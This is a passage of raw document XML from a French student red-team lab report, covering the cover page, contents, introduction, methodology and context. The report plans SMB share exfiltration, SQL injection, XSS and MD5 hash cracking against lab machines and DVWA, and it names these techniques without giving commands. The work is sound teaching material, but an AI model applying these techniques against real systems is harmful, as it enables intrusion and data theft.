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7B26" w14:textId="28BE85BF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drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251658240" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="301DBCAA" wp14:editId="7B51AB07">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-1127760</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-868680</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="7749540" cy="3382645"/>
            <wp:effectExtent l="0" t="0" r="3810" b="8255"/>
            <wp:wrapNone/>
            <wp:docPr id="2017710163" name="Image 1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10163" name="Image 1" descr="Une image contenant texte, Police, Graphique, logo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882AC1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00002A6A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715CD05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D57FED2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1D424636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A5CE989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1BAE0B57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44269461" w14:textId="1717176C" w:rsidR="001F42C6" w:rsidRDefault="008F1386" w:rsidP="001F42C6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56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color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56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Rapport de Sécurité Offensive</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5243D75D" w14:textId="6BEA426E" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="001F42C6">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56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color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56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Mini-Laboratoire Red Team</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C6C6DF6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168188D9" w14:textId="0C99F594" w:rsidR="001F42C6" w:rsidRPr="001F42C6" w:rsidRDefault="001F42C6" w:rsidP="008F1386">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F42C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Dans le cadre du c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t xml:space="preserve">ours : 8INF349 – </w:t>
      </w:r>
      <w:r w:rsidRPr="001F42C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve">Stage 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t>Projet</w:t>
      </w:r>
      <w:r w:rsidRPr="001F42C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA9F1E4" w14:textId="4D4167EE" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="001F42C6" w:rsidP="001F42C6">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001F42C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Présenté à :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t xml:space="preserve"> M. Martin</w:t>
      </w:r>
      <w:r w:rsidR="00455C8E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> Renaud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br/>
      </w:r>
      <w:r w:rsidRPr="001F42C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Par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t xml:space="preserve"> : Layba Oulare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br/>
        <w:t xml:space="preserve">Date : </w:t>
      </w:r>
      <w:r w:rsidRPr="001F42C6">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidR="00455C8E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="008F1386" w:rsidRPr="008F1386">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>/12/2025</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05B168E9" w14:textId="6695CF1A" w:rsid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063B46B1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B26D9D4" w14:textId="77777777" w:rsidR="001F42C6" w:rsidRDefault="001F42C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1C59AB4" w14:textId="77777777" w:rsidR="00C61D17" w:rsidRDefault="00C61D17" w:rsidP="00C61D17">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/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18AD263" w14:textId="38B8BA08" w:rsidR="00020E3E" w:rsidRPr="00020E3E" w:rsidRDefault="00020E3E" w:rsidP="00C61D17">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/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br/>
      </w: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br/>
      </w:r>
      <w:r w:rsidRPr="00020E3E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des matières</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B5EAF7" w14:textId="6A4D7913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Page de couverture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....................................................................................</w:t>
      </w:r>
      <w:r w:rsidR="00455C8E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t> 0.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F03FF1E" w14:textId="07418C3D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Introduction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..............................................................................................</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="275EDF44" w14:textId="7140A387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Méthodologie</w:t>
      </w:r>
      <w:r w:rsidR="00EA0C10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 xml:space="preserve"> et justification des choix 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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DA80479" w14:textId="45DF4B5D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Contexte, objectifs et limites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....................................................................</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>3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4.1 Contexte.....................................................................................................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3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4.2 Objectifs......................................................................................................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4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4.3 Limites.........................................................................................................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4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C08ED1" w14:textId="7071701B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Architecture du mini-laboratoire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5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5.1 Machines utilisées.......................................................................................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5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5.2 Réseaux VMware (Host-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Only</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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 xml:space="preserve"> vs NAT)....................................................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6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5.3 Schéma global de la topologie..................................................................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7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4333C151" w14:textId="51DFF68C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Attaque 1 : Exfiltration SMB (Host-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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Only</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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)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8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6.1 Objectif de l’attaque..................................................................................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8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6.2 Étapes détaillées.......................................................................................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9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6.2.1 Vérification réseau..............................................................................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9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6.2.2 Scan SMB............................................................................................1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0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6.2.3 Enumération des partages..................................................................1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0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6.2.4 Exfiltration de fichiers.........................................................................1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1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6.3 Schéma d’attaque SMB............................................................................1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2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6.4 Résultats observés....................................................................................1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2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6.5 Impacts organisationnels.........................................................................1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3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6.6 Recommandations sécurité SMB................................................................1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4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="338C0EA7" w14:textId="292400F6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 xml:space="preserve">Attaque 2 : Exploitation Web (DVWA – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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SQLi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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, XSS, Bruteforce)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5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7.1 Objectif de l’attaque..................................................................................1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5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7.2 Déploiement DVWA via Docker................................................................1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6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7.3 Configuration DVWA................................................................................1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7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7.4 Attaque SQL Injection...............................................................................1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8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7.4.1 Détection SQLi....................................................................................1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8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7.4.2 Exploitation SQLi.................................................................................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19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7.4.3 Extraction de données..........................................................................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19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7.5 Attaque XSS...............................................................................................2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0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7.6 Bruteforce des hash avec hashcat.............................................................2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1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7.7 Capture réseau avec tcpdump..................................................................2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2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7.8 Schéma d’attaque Web............................................................................2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3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1AE86C" w14:textId="3AB84A49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lastRenderedPageBreak/>
        <w:t>Discussion et limites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4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66534336" w14:textId="11C49AB2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Recommandations de sécurité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5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9.1 Durcissement SMB....................................................................................2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5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9.2 Sécurisation Web (OWASP)......................................................................2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6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br/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 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9.3 Recommandations organisationnelles......................................................2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6</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23464F80" w14:textId="50167C18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Conclusion générale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7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B64B605" w14:textId="60ED3D9A" w:rsidR="00020E3E" w:rsidRPr="00020E3E" w:rsidRDefault="00020E3E" w:rsidP="00020E3E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="47"/>
        </w:numPr>
        <w:spacing w:line="240" w:lineRule="auto"/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020E3E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Annexes – Commandes complètes</w:t>
      </w:r>
      <w:r w:rsidRPr="00020E3E">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>........................................................2</w:t>
      </w:r>
      <w:r w:rsidR="00C61D17">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BF269E" w14:textId="08612360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3E393DA3" w14:textId="6EEF7891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72D727EC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444922F9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6A71ADFE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0204BDF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5A92649F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38B5026A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606C9618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F7C9C48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1D3506E5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04F96F41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44D349C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25AAB1C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7561F02D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63925744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02B84DA9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6652BB21" w14:textId="77777777" w:rsidR="00020E3E" w:rsidRDefault="00020E3E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34FE7693" w14:textId="0E4E20F3" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F138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2117AF8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Dans ce projet, j’ai mis en place un mini-laboratoire de Red Team pour simuler des attaques réalistes dans un environnement contrôlé, proche d’un réseau d’entreprise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24B4DA5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L’objectif était de :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49299D84" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Concevoir une architecture de labo avec plusieurs machines virtuelles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C8C9D3B" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Mener plusieurs scénarios d’attaque :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1978B6D4" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Une attaque SMB avec exfiltration de fichiers depuis un poste Windows vulnérable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="470AA70D" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Une attaque Web contre l’application DVWA (Damn Vulnerable Web Application) en exploitant SQL Injection, XSS et bruteforce sur des hash de mots de passe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EB774DC" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Collecter des preuves techniques (captures d’écran, logs, pcap).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0B25A3" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Proposer une analyse des risques et des recommandations de sécurité.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AFD90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 projet se situe dans une logique de Red Team pédagogique : l’objectif n’est pas seulement de “casser des choses”, mais de comprendre, documenter, et expliquer comment ces attaques sont possibles, et comment une organisation pourrait s’en défendre.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2589DA" w14:textId="1196D8F8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38937420" w14:textId="0EF70FB3" w:rsidR="00EA0C10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Méthodologie</w:t>
      </w:r>
      <w:r w:rsidR="00EA0C10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 Justification des choix </w:t>
      </w:r>
      <w:r w:rsidR="00EA0C10">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:color w:val="4F81BD" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="2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A0C10">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="2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2.1 Méthodologie :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151A9D2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La méthodologie suivie est inspirée d’une approche classique offensive :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390C3E5B" w14:textId="31E06451" w:rsidR="008F1386" w:rsidRPr="00EA0C10" w:rsidRDefault="008F1386" w:rsidP="00EA0C10">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5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Définition de la portée et des objectifs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C10AB1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Machines incluses dans le labo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C3F5C6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Types d’attaques autorisées (SMB &amp; Web uniquement).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB8A616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Limites : pas d’élévation de privilèges avancée, pas de persistance longue durée.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC88F41" w14:textId="0AC0C6B5" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="00EA0C10" w:rsidP="00EA0C10">
      <w:pPr>
        <w:ind w:left="720"/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2.1.2 </w:t>
      </w:r>
      <w:r w:rsidR="008F1386"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Conception de l’architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2C94CB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Choix des machines virtuelles (Kali, Windows Client, Windows Server/DC).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="455503F7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Choix des types de réseaux VMware (Host-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et NAT).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6985FADC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Configuration des adresses IP et des services.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F5CBD9" w14:textId="26C19B30" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="00EA0C10" w:rsidP="00EA0C10">
      <w:pPr>
        <w:ind w:left="720"/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2.1.3 </w:t>
      </w:r>
      <w:r w:rsidR="008F1386"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Phase de reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179A1C53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Scan de ports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) sur le réseau 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0E3D637D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Découverte de services SMB exposés.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="641E62E3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Accès à DVWA via HTTP depuis le client.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC48C4E" w14:textId="6001AF9F" w:rsidR="008F1386" w:rsidRPr="00EA0C10" w:rsidRDefault="008F1386" w:rsidP="00EA0C10">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5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Exploitation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B47977B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Scenario 1 : SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="248B0900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Enumération de partages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04E50B23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Connexion via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61E8F1CA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Exfiltration de fichiers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4090B570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Scenario 2 : DVWA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A8D687A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Déploiement de DVWA via Docker.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DEDBB2D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Exploitation SQL Injection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5432A9A7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Exploitation XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A352B2" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="2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Récupération et craquage de hash avec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32A84723" w14:textId="3DB6D8B6" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="00EA0C10" w:rsidP="00EA0C10">
      <w:pPr>
        <w:ind w:left="720"/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2.1.5 </w:t>
      </w:r>
      <w:r w:rsidR="008F1386"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Collecte de preuves</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBDE6B3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tcpdump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pour capturer le trafic HTTP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C484AD4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Captures d’écran des sorties de commandes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C6B6CC7" w14:textId="323482E2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Fichier</w:t>
      </w:r>
      <w:r w:rsidR="00437BBC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.pcap pour analyse Wireshark.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6038C5E3" w14:textId="53F347C2" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="00EA0C10" w:rsidP="00EA0C10">
      <w:pPr>
        <w:ind w:left="720"/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2.1.6 </w:t>
      </w:r>
      <w:r w:rsidR="008F1386"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Analyse et rédaction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D0C8D1F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Analyse des risques techniques et organisationnels.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="658EE189" w14:textId="77777777" w:rsidR="008F1386" w:rsidRP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Liens avec les bonnes pratiques (OWASP, durcissement SMB, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="356F279A" w14:textId="77777777" w:rsidR="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Rédaction du rapport en structurant les deux scénarios d’attaque.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7BCF61" w14:textId="71C04ACF" w:rsidR="00EA0C10" w:rsidRDefault="00EA0C10" w:rsidP="00EA0C10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>2.2 Justification des choix :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C24E6F" w14:textId="77777777" w:rsidR="00EA0C10" w:rsidRPr="00EA0C10" w:rsidRDefault="00EA0C10" w:rsidP="00EA0C10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>Pourquoi ces attaques ?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0047F54F" w14:textId="2CB651B1" w:rsidR="00EA0C10" w:rsidRPr="00EA0C10" w:rsidRDefault="00EA0C10" w:rsidP="00EA0C10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 xml:space="preserve">2.2.1 </w:t>
      </w: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>SMB (attaque interne)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639A8A46" w14:textId="77777777" w:rsidR="00EA0C10" w:rsidRPr="00EA0C10" w:rsidRDefault="00EA0C10" w:rsidP="00EA0C10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Simule un employé malveillant ou un attaquant déjà dans le réseau.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB79093" w14:textId="77777777" w:rsidR="00EA0C10" w:rsidRPr="00EA0C10" w:rsidRDefault="00EA0C10" w:rsidP="00EA0C10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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C'est une attaque </w:t>
      </w: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>extrêmement fréquente</w:t>
      </w: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en entreprise.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3223E8" w14:textId="77777777" w:rsidR="00EA0C10" w:rsidRPr="00EA0C10" w:rsidRDefault="00EA0C10" w:rsidP="00EA0C10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Utilise des </w:t>
      </w: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>mots de passe faibles</w:t>
      </w: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→ vecteur le plus courant.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31984037" w14:textId="6162F74E" w:rsidR="00EA0C10" w:rsidRPr="00EA0C10" w:rsidRDefault="00EA0C10" w:rsidP="00EA0C10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 xml:space="preserve">2.2.2 </w:t>
      </w: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>SQL Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E45C04" w14:textId="77777777" w:rsidR="00EA0C10" w:rsidRPr="00EA0C10" w:rsidRDefault="00EA0C10" w:rsidP="00EA0C10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Figure dans l’OWASP Top 10 depuis 20 ans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAADDB8" w14:textId="77777777" w:rsidR="00EA0C10" w:rsidRPr="00EA0C10" w:rsidRDefault="00EA0C10" w:rsidP="00EA0C10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Très réaliste : mauvaises pratiques de développement.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5508B4A2" w14:textId="77777777" w:rsidR="00EA0C10" w:rsidRPr="00EA0C10" w:rsidRDefault="00EA0C10" w:rsidP="00EA0C10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Permet d’extraire des données sensibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A068E0E" w14:textId="27051D54" w:rsidR="00EA0C10" w:rsidRPr="00EA0C10" w:rsidRDefault="00EA0C10" w:rsidP="00EA0C10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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2.2.3</w:t>
      </w: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 xml:space="preserve"> XSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78849BCE" w14:textId="77777777" w:rsidR="00EA0C10" w:rsidRPr="00EA0C10" w:rsidRDefault="00EA0C10" w:rsidP="00EA0C10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Permet le vol de cookies, détournement de sessions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125A1D2F" w14:textId="4BF35A95" w:rsidR="00EA0C10" w:rsidRPr="00EA0C10" w:rsidRDefault="00EA0C10" w:rsidP="00EA0C10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</w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>2.2.4</w:t>
      </w:r>
      <w:r w:rsidRPr="00EA0C10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t xml:space="preserve"> Bruteforce + hash cracking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261E448E" w14:textId="77777777" w:rsidR="00EA0C10" w:rsidRPr="00EA0C10" w:rsidRDefault="00EA0C10" w:rsidP="00EA0C10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Montre la faiblesse des hash rapides (MD5).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044F08D4" w14:textId="6DA71079" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="00EA0C10" w:rsidP="008F1386">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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EA0C10">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Très pédagogique pour comprendre les risques de mots de passe faibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6712643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Contexte, objectifs et limites</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="479C4CF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3.1 Contexte</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5242045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 laboratoire représente une petite organisation interne :</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49AD3833" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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poste client Windows utilisé par un employé.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1551D805" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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contrôleur de domaine (Windows Server) jouant le rôle de DC/serveur de fichiers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FD8E2F9" w14:textId="77777777" w:rsidR="008F1386" w:rsidRPr="008F1386" w:rsidRDefault="008F1386" w:rsidP="008F1386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Une machine Kali Linux jouant le rôle d’attaquant interne ou post-compromission.</w:t>
      </w:r>
    </w:p>
